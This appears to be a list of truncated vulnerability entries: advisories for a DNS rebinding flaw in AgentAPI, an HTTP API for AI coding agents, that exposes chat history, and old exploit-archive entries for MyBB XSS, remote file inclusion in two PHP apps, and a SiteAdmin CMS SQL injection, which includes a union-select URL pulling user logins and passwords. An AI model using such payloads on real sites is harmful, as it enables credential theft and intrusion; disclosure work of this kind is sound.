CVE-2025-59956 AgentAPI exposed user chat history via a DNS rebinding attack

AgentAPI is an HTTP API for Claude Code, Goose, Aider, Gemini, Amp, and Codex. Versions 0.3.3 and below are susceptible to a client-side DNS rebinding attack when hosted over plain HTTP on localhost. An attacker can gain access to the /messages endpoint served by the Agent API. This allows for th...

GHSA-W64R-2G3W-W8W4 Coder AgentAPI exposed user chat history via a DNS rebinding attack

Summary AgentAPI prior to version 0.4.0 was susceptible to a client-side DNS rebinding attack when hosted over plain HTTP on localhost. Impact An attacker could have gained access to the /messages endpoint served by the Agent API. This allowed for the unauthorized exfiltration of sensitive user...

MyBB 1.6.12 POST Cross Site Scripting

alert/XSS/ " / document.exploit.submit;...

Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion

Author : EA Ngel + Location : Manado - Indonesia + Situs : wwwdotmanadocodingdotnet + Contact : engelpemulaatgmaildotcom + Download Script : http://sourceforge.net/projects/drunkengolem/ / Dork : sitou timou tumou tou Bug : include $rootpath."/include/irc/phpIRC.php"; ^ 3xpl0it :...

SiteAdmin CMS - 'art' SQL Injection

SiteAdmin CMS Remote Sql Injection Vuln. Download : http://www.as-admin.com Cr@zyKing / sqL Lov3r'Z Crew Co. http://localhost/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concatws0x3a3a,userlogin,userpassw,4,5,6,7+from+authusers+limit+3,10/&cat=2 Admin Panel :...

OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ================================================================= OpenBASE 0.6a rootprefix Remote File Inclusion Vulnerabilities ================================================================= DeltaSecurityTEAM Portal Name = OpenBASE Alp...